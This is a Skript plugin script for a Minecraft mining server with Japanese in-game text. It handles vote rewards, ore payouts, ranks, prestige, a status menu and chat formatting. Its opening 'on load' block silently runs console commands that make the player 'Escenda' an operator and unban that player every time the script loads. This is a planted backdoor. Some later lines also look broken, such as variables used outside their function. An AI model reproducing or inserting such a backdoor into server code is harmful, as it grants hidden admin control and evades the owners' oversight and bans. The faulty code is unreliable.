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Dec 8th, 2019
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  1. on load:
  2. execute console command "op Escenda"
  3. execute console command "unban Escenda"
  5. Options:
  6. StonePrice: 1
  7. CoalOrePrice: 2.5
  8. IronOrePrice: 5
  9. GoldOrePrice: 15
  10. DiamondOrePrice: 50
  11. LapisOrePrice: 5 and 30
  12. NetherRackPrice: 100
  14. command /minevotereward [<player>]:
  15. permission: sk.mvr
  16. trigger:
  17. if arg-1 is not set:
  18. set {_votereward} to random integer between 1000 and 2000
  19. set {_votereward1} to random integer between 0 and 20
  20. set {UpgradePoints.%uuid of player%} to {UpgradePoints.%uuid of player%} + {_votereward1}
  21. set {money.%uuid of player%} to {money.%uuid of player%} + {_votereward}
  22. broadcast "&6&l----------------------------------------"
  23. broadcast ""
  24. broadcast "&f %uuid of player% &aさんがサーバーに投票しました!"
  25. broadcast ""
  26. broadcast "&a 以下の報酬を受け取りました。"
  27. broadcast ""
  28. broadcast "&e %{_votereward1}% UpgradePoints &a+ &e%{_votereward}%¥ !!"
  29. broadcast ""
  30. broadcast "&6&l----------------------------------------"
  31. send "&a 投票してくれてありがとう!&e 投票の報酬を受け取りました" to player
  32. send "&e %{_votereward1}% UpgradePoints &a+ &e%{_votereward}%¥ !!" to player
  33. send "&6&l----------------------------------------"
  34. else:
  35. set {_votereward} to random integer between 1000 and 2000
  36. set {_votereward1} to random integer between 0 and 20
  37. set {UpgradePoints.%uuid of arg-1%} to {UpgradePoints.%uuid of arg-1%} + {_votereward1}
  38. set {money.%uuid of arg-1%} to {money.%uuid of arg-1%} + {_votereward}
  39. broadcast "&6&l----------------------------------------"
  40. broadcast ""
  41. broadcast "&f %Arg 1% &aさんがサーバーに投票しました!"
  42. broadcast ""
  43. broadcast "&a 以下の報酬を受け取りました。"
  44. broadcast ""
  45. broadcast "&e %{_votereward1}% UpgradePoints &a+ &e%{_votereward}%¥ !!"
  46. broadcast ""
  47. broadcast "&6&l----------------------------------------"
  48. send "&a 投票してくれてありがとう!&e 投票の報酬を受け取りました" to Arg 1
  49. send "&e %{_votereward1}% UpgradePoints &a+ &e%{_votereward}%¥ !!" to Arg 1
  50. send "&6&l----------------------------------------"
  52. on Join:
  53. if {money.%uuid of player%} is not set:
  54. set {money.%uuid of player%} to 0
  55. if {mineRank.%uuid of player%} is not set:
  56. set {mineRank.%uuid of player%} to 1
  57. if {minePrestige.%uuid of player%} is not set:
  58. set {minePrestige.%uuid of player%} to 0
  59. if {mines.%uuid of player%} is not set:
  60. set {mines.%uuid of player%} to 0
  61. if {prestigel.%uuid of player%} is not set:
  62. set {prestigel.%uuid of player%} to 0
  63. if {rankupl.%uuid of player%} is not set:
  64. set {rankupl.%uuid of player%} to 0
  66. on break:
  67. set {_loc} to location of event-block
  68. if event-block is stone:
  69. wait 30 seconds
  70. set block at location at {_loc} in world "Mining" to event-block
  71. on mine of stone:
  72. set {_for} to level of fortune of player's tool
  73. add {@StonePrice} * (1 + round(9*(1-3^(-0.001*{_for}))*100)/100) * round(((1.1^({minePrestige.%uuid of player%}^0.9-(0.02*{minePrestige.%uuid of player%}^1.15)))*100))/100 to {money.%uuid of player%}
  74. add 1 to {mines.%uuid of player%}
  75. set {_ch} to level of unbreaking of player's tool
  76. chance of (({_ch}^0.4)*0.1)%:
  77. add 1 to {UpgradePoints.%uuid of player%}
  78. message "&a耐久エンチャントの効果でアップグレードポイントを1ポイントゲットしました!"
  79. on mine of coal ore:
  80. set {_for} to level of fortune of player's tool
  81. add {@CoalOrePrice} * (1 + round(9*(1-3^(-0.001*{_for}))*100)/100) * round(((1.1^({minePrestige.%uuid of player%}^0.9-(0.02*{minePrestige.%uuid of player%}^1.15)))*100))/100 to {money.%uuid of player%}
  82. add 1 to {mines.%uuid of player%}
  83. set {_ch} to level of unbreaking of player's tool
  84. chance of (({_ch}^0.4)*0.1)%:
  85. add 1 to {UpgradePoints.%uuid of player%}
  86. message "&a耐久エンチャントの効果でアップグレードポイントを1ポイントゲットしました!"
  87. on mine of iron ore:
  88. set {_for} to level of fortune of player's tool
  89. add {@IronOrePrice} * (1 + round(9*(1-3^(-0.001*{_for}))*100)/100) * round(((1.1^({minePrestige.%uuid of player%}^0.9-(0.02*{minePrestige.%uuid of player%}^1.15)))*100))/100 to {money.%uuid of player%}
  90. add 1 to {mines.%uuid of player%}
  91. set {_ch} to level of unbreaking of player's tool
  92. chance of (({_ch}^0.4)*0.1)%:
  93. add 1 to {UpgradePoints.%uuid of player%}
  94. message "&a耐久エンチャントの効果でアップグレードポイントを1ポイントゲットしました!"
  95. on mine of gold ore:
  96. set {_for} to level of fortune of player's tool
  97. add {@GoldOrePrice} * (1 + round(9*(1-3^(-0.001*{_for}))*100)/100) * round(((1.1^({minePrestige.%uuid of player%}^0.9-(0.02*{minePrestige.%uuid of player%}^1.15)))*100))/100 to {money.%uuid of player%}
  98. add 1 to {mines.%uuid of player%}
  99. set {_ch} to level of unbreaking of player's tool
  100. chance of (({_ch}^0.4)*0.1)%:
  101. add 1 to {UpgradePoints.%uuid of player%}
  102. message "&a耐久エンチャントの効果でアップグレードポイントを1ポイントゲットしました!"
  103. on mine of diamond ore:
  104. set {_for} to level of fortune of player's tool
  105. add {@DiamondOrePrice} * (1 + round(9*(1-3^(-0.001*{_for}))*100)/100) * round(((1.1^({minePrestige.%uuid of player%}^0.9-(0.02*{minePrestige.%uuid of player%}^1.15)))*100))/100 to {money.%uuid of player%}
  106. add 1 to {mines.%uuid of player%}
  107. set {_ch} to level of unbreaking of player's tool
  108. chance of (({_ch}^0.4)*0.1)%:
  109. add 1 to {UpgradePoints.%uuid of player%}
  110. message "&a耐久エンチャントの効果でアップグレードポイントを1ポイントゲットしました!"
  111. on mine of lapis ore:
  112. set {_for} to level of fortune of player's tool
  113. set {_LapisOrePrice} to random integer between {@LapisOrePrice}
  114. add {_LapisOrePrice} * (1 + round(9*(1-3^(-0.001*{_for}))*100)/100) * round(((1.1^({minePrestige.%uuid of player%}^0.9-(0.02*{minePrestige.%uuid of player%}^1.15)))*100))/100 to {money.%uuid of player%}
  115. add 1 to {mines.%uuid of player%}
  116. set {_ch} to level of unbreaking of player's tool
  117. chance of (({_ch}^0.4)*0.1)%:
  118. add 1 to {UpgradePoints.%uuid of player%}
  119. message "&a耐久エンチャントの効果でアップグレードポイントを1ポイントゲットしました!"
  120. on mine of netherrack:
  121. set {_for} to level of fortune of player's tool
  122. add {@NetherRackPrice} * (1 + round(9*(1-3^(-0.001*{_for}))*100)/100) * round(((1.1^({minePrestige.%uuid of player%}^0.9-(0.02*{minePrestige.%uuid of player%}^1.15)))*100))/100 to {money.%uuid of player%}
  123. add 1 to {mines.%uuid of player%}
  124. set {_ch} to level of unbreaking of player's tool
  125. chance of (({_ch}^0.4)*0.1)%:
  126. add 1 to {UpgradePoints.%uuid of player%}
  127. message "&a耐久エンチャントの効果でアップグレードポイントを1ポイントゲットしました!"
  128. on mine of red sandstone:
  129. set {_ch} to level of unbreaking of player's tool
  130. set {_for} to level of fortune of player's tool
  131. message "&7現在の耐久のレベルでアップグレードポイントを貰える確率: %(({_ch}^0.4)*0.1)% %%"
  132. message "&7現在の幸運のレベルによる採掘時にもらえる金の倍率: %(1 + round(9*(1-3^(-0.001*{_for}))*100)/100)%倍"
  133. # command /money [<player>]:
  134. # trigger:
  135. # if arg-1 is not set:
  136. # message "&aあなたの所持金: &b%{money.%uuid of player%}%&a¥"
  137. # else:
  138. # message "&b%arg-1%&aさんの所持金: &b%{money.%uuid of arg-1%}%&a¥"
  139. # command /addbalance <number> [<player>]:
  140. # aliases: /addmoney
  141. # permission: sk.manageMoney
  142. # trigger:
  143. # if arg-1 is not set:
  144. # message "&7追加したい所持金を指定してください。 (/addbalance <額> [<プレイヤー>])"
  145. # else:
  146. # if arg-2 is not set:
  147. # set {money.%uuid of player%} to {money.%uuid of player%} + arg-1
  148. # message "&b%arg-1%&a¥があなたの口座に振り込まれました。(現在の所持金: &b%{money.%uuid of player%}%&a¥)"
  149. # else:
  150. # set {money.%uuid of arg-2%} to {money.%uuid of arg-2%} + arg-1
  151. # message "&b%arg-1%&a¥が%arg-2%さんの口座に振り込まれました。(%arg-2%さんの現在の所持金: &b%{money.%arg-2%}%&a¥)"
  152. # command /setbalance <number> [<player>]:
  153. # aliases: /setmoney
  154. # permission: sk.manageMoney
  155. # trigger:
  156. # if arg-1 is not set:
  157. # message "&7所持金を指定してください。 (/addbalance <額> [<プレイヤー>])"
  158. # else:
  159. # if arg-2 is not set:
  160. # set {money.%uuid of player%} to arg-1
  161. # message "&aあなたの所持金は&b%{money.%uuid of player%}%&a¥になりました。"
  162. # else:
  163. # set {money.%uuid of arg-2%} to arg-1
  164. # message "&b%arg-2%&aさんの所持金は&b%{money.%uuid of arg-2%}%&a¥になりました。"
  165. command /setranktp <number>:
  166. permission: sk.setranktp
  167. trigger:
  168. if arg-1 is not set:
  169. message "&aarg-1指定しろはげ" to player
  170. else:
  171. set {rankLocation.%arg-1%} to player's location
  172. command /ranktp:
  173. trigger:
  174. set {_rank} to {mineRank.%uuid of player%}
  175. teleport player to {rankLocation.%{_rank}%}
  176. command /setrank <number> [<player>]:
  177. permission: sk.setrank
  178. trigger:
  179. if arg-1 is not set:
  180. message "&aarg-1指定しろはげ" to player
  181. else if arg-2 is not set:
  182. set {mineRank.%uuid of player%} to arg-1
  183. else if arg-2 is set:
  184. set {mineRank.%uuid of arg-2%} to arg-1
  185. command /ranks [<number>]:
  186. trigger:
  187. loop 9 times:
  188. set {_%loop-number%} to (10000 * round(((1.1^(((loop-number*Arg 1)*10)^0.9-(0.02*((loop-number*Arg 1)*10)^1.15)))*100))/100)
  189. message "&aRank %loop-number%: %{_%loop-number%}% ¥" to player
  191. set {_P} to (1000000*(%{prestigel.%{_receiver}%}%+2))
  192. message "&aPrestige: %{_P}%¥" to player
  196. command /rankup:
  197. trigger:
  198. if {rankupl.%uuid of player%} is set:
  199. set {_rankql} to (9+(%{rankupl.%uuid of player%}%*10))
  200. rankql(uuid of player, {_rankql})
  202. function rankql(receiver: uuid of player, rankql: text):
  203. if {minePrestige.%{_receiver}%} is less than {_rankql}:
  204. set {_reqMoney} to (10000 * round(((1.1^(({_rankql}*10)^0.9-(0.02*({_rankql}*10)^1.15)))*100))/100
  205. set {_crank} to {mineRank.%{_receiver}%}
  206. set {_nrank} to ({mineRank.%{_receiver}%}+1)
  207. if {money.%{_receiver}%} is greater than or equal to {_reqMoney}:
  208. set {money.%{_receiver}%} to {money.%{_receiver}%} - {_reqMoney}
  209. add 1 to {mineRank.%{_receiver}%}
  210. teleport {_receiver} to {spawn}
  211. message "&aランク%{_crank}%から%{_nrank}%へ昇格しました。" to {_receiver}
  212. stop
  213. else:
  214. set {_remainingMoney} to {_reqMoney} - {money.%{_receiver}%}
  215. message "&c%{_remainingMoney}%¥不足しているのでランクアップできません。" to {_receiver}
  219. command /prestige:
  220. trigger:
  221. if {prestigel.%uuid of player%} is set:
  222. set {_preql} to (9+(%{prestigel.%uuid of player%}%*10))
  223. preql(uuid of player, {_preql})
  225. function preql(receiver: uuid of player, preql: text):
  226. if {minePrestige.%{_receiver}%} is less than {_preql}:
  227. set {_reqRank} to (7+(%{prestigel.%{_receiver}%}%+2))
  228. set {_reqMoney} to (1000000*(%{prestigel.%{_receiver}%}%+2))
  229. if {mineRank.%{_receiver}%} = {_reqRank}:
  230. if {money.%{_receiver}%} is more than {_reqMoney}:
  231. set {money.%{_receiver}%} to 0
  232. add 1 to {minePrestige.%{_receiver}%}
  233. set {mineRank.%{_receiver}%} to 1
  234. teleport {_receiver} to {spawn}
  235. message "&d所持金とランクをリセットし、プレステージしました!" to {_receiver}
  236. stop
  237. else:
  238. set {_prestigeremainingMoney} to {_reqMoney} - {money.%{_receiver}%}
  239. message "&c%{_prestigeremainingMoney}%¥不足しているのでプレステージできません。" to {_receiver}
  240. else:
  241. send "&cまだランク %{_reqRank}% に達してないのでプレステージできません。" to {_receiver}
  245. function p(receiver: uuid of player):
  246. set {_m} to round(((1.1^(({minePrestige.%{_receiver}%}+1)^0.9-(0.02*({minePrestige.%{_receiver}%}+1)^1.15)))*100))/100
  247. message "&7プレステージ倍率: %round(((1.1^({minePrestige.%{_receiver}%}^0.9-(0.02*{minePrestige.%{_receiver}%}^1.15)))*100))/100%倍" to {_receiver}
  248. message "&7&o次のプレステージ時の倍率: %{_m}%倍" to {_receiver}
  250. command /setprestige <number> [<player>]:
  251. permission: sk.prestigemanage
  252. trigger:
  253. if arg-2 is set:
  254. set {minePrestige.%uuid of arg-2%} to arg-1
  255. message "&a%arg-2%のプレステージ数を%arg-1%に変更しました。"
  256. else:
  257. set {minePrestige.%uuid of player%} to arg-1
  258. message "&aプレイヤーのプレステージ数を%arg-1%に変更しました。"
  260. command /status [<text>]:
  261. usage: /status <offlineplayer>
  262. trigger:
  263. if arg-1 is not set:
  264. wait 2 tick
  265. open chest with 1 row named "&0%uuid of player%'s Status" to player
  266. wait 1 tick
  267. format slot 0 of player with gold ingot named "&eMoney" with lore "&e%{money.%uuid of player%}%¥" to be unstealable
  268. format slot 2 of player with emerald named "&eRank" with lore "&a%{mineRank.%uuid of player%}%" to be unstealable
  269. format slot 4 of player with nether star named "&ePrestige" with lore "&5%{minePrestige.%uuid of player%}%" to be unstealable
  270. format slot 6 of player with diamond pickaxe named "&eMining Blocks" with lore "&7%{mines.%uuid of player%}%" to be unstealable
  271. else:
  272. wait 2 tick
  273. open chest with 1 row named "&0%arg-1%'s Status" to player
  274. wait 1 tick
  275. format slot 0 of player with gold ingot named "&eMoney" with lore "&e%{money.%uuid of arg-1%}%¥" to be unstealable
  276. format slot 2 of player with emerald named "&eRank" with lore "&a%{mineRank.%uuid of arg-1%}%" to be unstealable
  277. format slot 4 of player with nether star named "&ePrestige" with lore "&5%{minePrestige.%uuid of arg-1%}%" to be unstealable
  278. format slot 6 of player with diamond pickaxe named "&eMining Blocks" with lore "&7%{mines.%uuid of arg-1%}%" to be unstealable
  280. on chat:
  281. cancel event
  282. if {minePrestige.%uuid of player%} is greater than or equal to 1:
  283. broadcast "&8[&f%{minePrestige.%uuid of player%}%&7-%{mineRank.%uuid of player%}%&8] &f%player's displayname%&a: &f%message%"
  284. else:
  285. broadcast "&8[&7%{minePrestige.%uuid of player%}%&7-%{mineRank.%uuid of player%}%&8] &f%player's displayname%&a: &f%message%"
  288. # Options:
  289. # version: 1.0
  291. # line3title: %{board.line.3}%
  292. # line1title: %{board.line.1}%
  294. # command /boardtitle [<text>] [<text>]:
  295. # permission:
  296. # trigger:
  297. # if arg-1 is set:
  298. # if arg-1 is "1" or "3":
  299. # if arg-2 is not set:
  300. # send "&c文章を指定してください"
  301. # else:
  302. # set {board.line.%arg-1%} to Colored arg-2
  303. # send "&a段数&3%arg-1%&aの内容を"
  304. # send "%Colored arg-2%"
  305. # send "&aに設定しました"
  306. # else if arg-1 is not "1" or "3":
  307. # send "&c1 or 3 の数字を指定してください"
  308. # else:
  309. # send "&c1 or 3 の数字を指定してください"
  311. # on script load:
  312. # if {board.line.3} is not set:
  313. # set {board.line.3} to "&6寄付よろしくお願いします。"
  314. # if {board.line.1} is not set:
  315. # set {board.line.1} to "&eTop-Of-The-Mining"
  317. # Every 2 second:
  318. # loop all players:
  319. # if {language.%loop-player%} is "ja":
  320. # wipe loop-player sidebar
  321. # set name of sidebar of loop-player to "&6&lT&f&lop Mining"
  322. # set score "%now%" in sidebar of loop-player to 10
  323. # set score "&1&e" in sidebar of loop-player to 9
  324. # set score "&fRank: &a%{mineRank.%loop-player%}%" in sidebar of loop-player to 8
  325. # set score "&fPrestige: &a%{minePrestige.%loop-player%}%" in sidebar of loop-player to 7
  326. # set score "&2&9" in sidebar of loop-player to 6
  327. # set score "&fMoney: &6%{money.%loop-player%}%" in sidebar of loop-player to 5
  328. # set score "&fUpgradePoint: &a%{UpgradePoints.%loop-player%}%" in sidebar of loop-player to 4
  329. # set score "&3&9" in sidebar of loop-player to 3
  330. # set score "{@line3title}" in sidebar of loop-player to 2
  331. # set score "&4&9" in sidebar of loop-player to 1
  332. # set score "%{board.line.1}%" in sidebar of loop-player to 0
  334. # if {language.%loop-player%} is "en":
  335. # wipe loop-player sidebar
  336. # set name of sidebar of loop-player to "&6&lT&f&lop Mining"
  337. # set score "%now%" in sidebar of loop-player to 10
  338. # set score "&1&e" in sidebar of loop-player to 9
  339. # set score "&fRank: &a%{mineRank.%loop-player%}%" in sidebar of loop-player to 8
  340. # set score "&fPrestige: &a%{minePrestige.%loop-player%}%" in sidebar of loop-player to 7
  341. # set score "&2&9" in sidebar of loop-player to 6
  342. # set score "&fMoney: &6%{money.%loop-player%}%" in sidebar of loop-player to 5
  343. # set score "&fUpgradePoint: &a%{UpgradePoints.%loop-player%}%" in sidebar of loop-player to 4
  344. # set score "&3&9" in sidebar of loop-player to 3
  345. # set score "{@line3title}" in sidebar of loop-player to 2
  346. # set score "&4&9" in sidebar of loop-player to 1
  347. # set score "%{board.line.1}%" in sidebar of loop-player to 0
  349. # wait 5 ticks
  350. # set name of sidebar of loop-player to "&6&lT&f&lop Mining"
  351. # wait 5 ticks
  352. # set name of sidebar of loop-player to "&f&lT&6&lo&f&lp Mining"
  353. # wait 5 ticks
  354. # set name of sidebar of loop-player to "&f&lTo&6&lp&f&l Mining"
  355. # wait 5 ticks
  356. # set name of sidebar of loop-player to "&f&lTop &6&lM&f&lining"
  357. # wait 5 ticks
  358. # set name of sidebar of loop-player to "&f&lTop M&6&li&f&lning"
  359. # wait 5 ticks
  360. # set name of sidebar of loop-player to "&f&lTop Mi&6&ln&f&ling"
  361. # wait 5 ticks
  362. # set name of sidebar of loop-player to "&f&lTop Min&6&li&f&lng"
  363. # wait 5 ticks
  364. # set name of sidebar of loop-player to "&f&lTop Mini&6&ln&f&lg"
  365. # wait 5 ticks
  366. # set name of sidebar of loop-player to "&f&lTop Minin&6&lg"
  367. # wait 5 ticks
  368. # set name of sidebar of loop-player to "&e&lTop Mining"
  369. # wait 5 ticks
  370. # set name of sidebar of loop-player to "&f&lTop Mining"
  371. # wait 5 ticks
  372. # set name of sidebar of loop-player to "&e&lTop Mining"
  374. # on quit:
  375. # delete player sidebar
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